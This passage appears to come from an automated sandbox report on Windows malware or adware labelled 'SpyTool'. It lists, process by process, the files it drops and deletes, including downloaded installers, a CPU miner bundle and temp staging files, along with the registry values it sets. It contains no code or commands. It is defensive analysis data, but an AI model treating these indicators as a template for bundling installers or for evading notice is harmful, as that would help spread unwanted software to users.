%Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\nb.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\en-GB.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sk.pak (229 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\kn.pak (1768 bytes)
%Documents and Settings%\All Users\Desktop\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sl.pak (211 bytes)

The SpyTool deletes the following file(s):

%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\wow_helper.exe (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606 (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\mybrowser.exe (0 bytes)
%Program Files%\MyBrowser\MyBrowser (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\prefs (0 bytes)

The process nsp45.tmp:596 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf48.tmp (19514 bytes)
%Program Files%\AnyProtectEx\product.guid (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\flush-inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\WmiInspector.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\inetc.dll (784 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp (0 bytes)
%Documents and Settings%\%current user%\Application Data\AnyProtectEx\installer\tempfile.t (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf47.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl4A.tmp (0 bytes)

The process wmic.exe:1336 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

The process nsr21.tmp:908 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\checks.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss24.tmp (5929 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\post_reply.htm (14 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\thankyou[1].php (0 bytes)

The process nsr18.tmp:1388 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1B.tmp (8776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\amisid.exe (1856 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsm1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\amisid.exe (0 bytes)

The process nsr18.tmp:460 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss1E.tmp (8776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\amisid.exe (1856 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\amisid.exe (0 bytes)

The process nsx27.tmp:1340 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-6JM0V.tmp\nsx27.tmp (3781 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-6JM0V.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-6JM0V.tmp\nsx27.tmp (0 bytes)

The process nsx27.tmp:336 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Start Menu\Programs\GAMESDESKTOP\GamesDesktop.lnk (812 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\upgmsd_re_005010096.7z (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\encrypt.exe (4185 bytes)
%Program Files%\gmsd_re_005010096\predm.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-42CRH.tmp (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-QF5NP.tmp (15278 bytes)
%Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe (29430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gamesdesktop_widget.7z (15278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-UJDHN.tmp (4185 bytes)
%Program Files%\gmsd_re_005010096\unins000.msg (375 bytes)
%Program Files%\gmsd_re_005010096\gamesdesktop_widget.exe (77005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gmsd_re_005010096.7z (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\itdownload.dll (1281 bytes)
%Program Files%\gmsd_re_005010096\is-QNSOT.tmp (22284 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\predm.7z (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\ex.bat (1564 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp (4 bytes)
%Program Files%\gmsd_re_005010096\unins000.dat (29605 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-TA4AV.tmp (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\CheckProc.cmd (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-KNG9H.tmp (2105 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gamesdesktop_widget.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\av.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\upgmsd_re_005010096.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\encrypt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\predm.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\upgmsd_re_005010096.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gmsd_re_005010096.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\itdownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\predm.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\ex.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\CheckProc.cmd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gamesdesktop_widget.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gmsd_re_005010096.exe (0 bytes)

The process encrypt.exe:1700 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\upgmsd_re_005010096.exe (24230 bytes)

The process encrypt.exe:1364 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\predm.exe (1447 bytes)

The process encrypt.exe:1564 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gmsd_re_005010096.exe (31996 bytes)

The process encrypt.exe:496 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gamesdesktop_widget.exe (92311 bytes)

The process %original file name%.exe:860 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr20.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssE.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso13.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\7121923af824073a25b2b7e6ba0a6e0e[1].exe (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd41.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa28.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf46.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss26.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy34.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp45.tmp (38832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\CESwN2Es[1].exe (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg10.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\setup[1].exe (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\VuuPC_VO2_8907[1].exe (14960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm22.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu3B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss40.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp5.tmp (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2D.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\Bundle_CPUminer[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\setup_gmsd_re[1].exe (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy42.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqA.tmp (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq9.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg4B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\AnyProtectSetup[1].exe (38832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2E.tmp (13784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssF.tmp (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3D.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz36.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3C.tmp (14960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (90 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj35.tmp (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\vos[1].htm (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\smt[1].exe (13784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\cmmdWriter[1].exe (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk15.tmp (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg16.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk44.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\policyname[1].exe (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx27.tmp (365499 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf46.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss26.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu3B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss40.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg4B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd41.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy34.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz36.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa28.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj35.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk44.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx27.tmp (0 bytes)

The process nsd41.tmp:816 makes changes in the file system.


The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nse43.tmp (0 bytes)

The process nsk6.tmp:496 makes changes in the file system.


The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsq8.tmp (0 bytes)

The process nsqA.tmp:508 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsrD.tmp (7695 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nscC.tmp (0 bytes)

Registry activity

The process upgmsd_re_005010096.exe:1928 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Tutorials\updatetutorialeshp]
"Version" = "gmsd_re_005010096"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Tutorials]
"HostGUID" = "BCAF20B8-5919-4396-B056-12146139373A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 5E 27 6F EF D3 7C C8 B2 D2 1E 06 06 27 C0 E4"

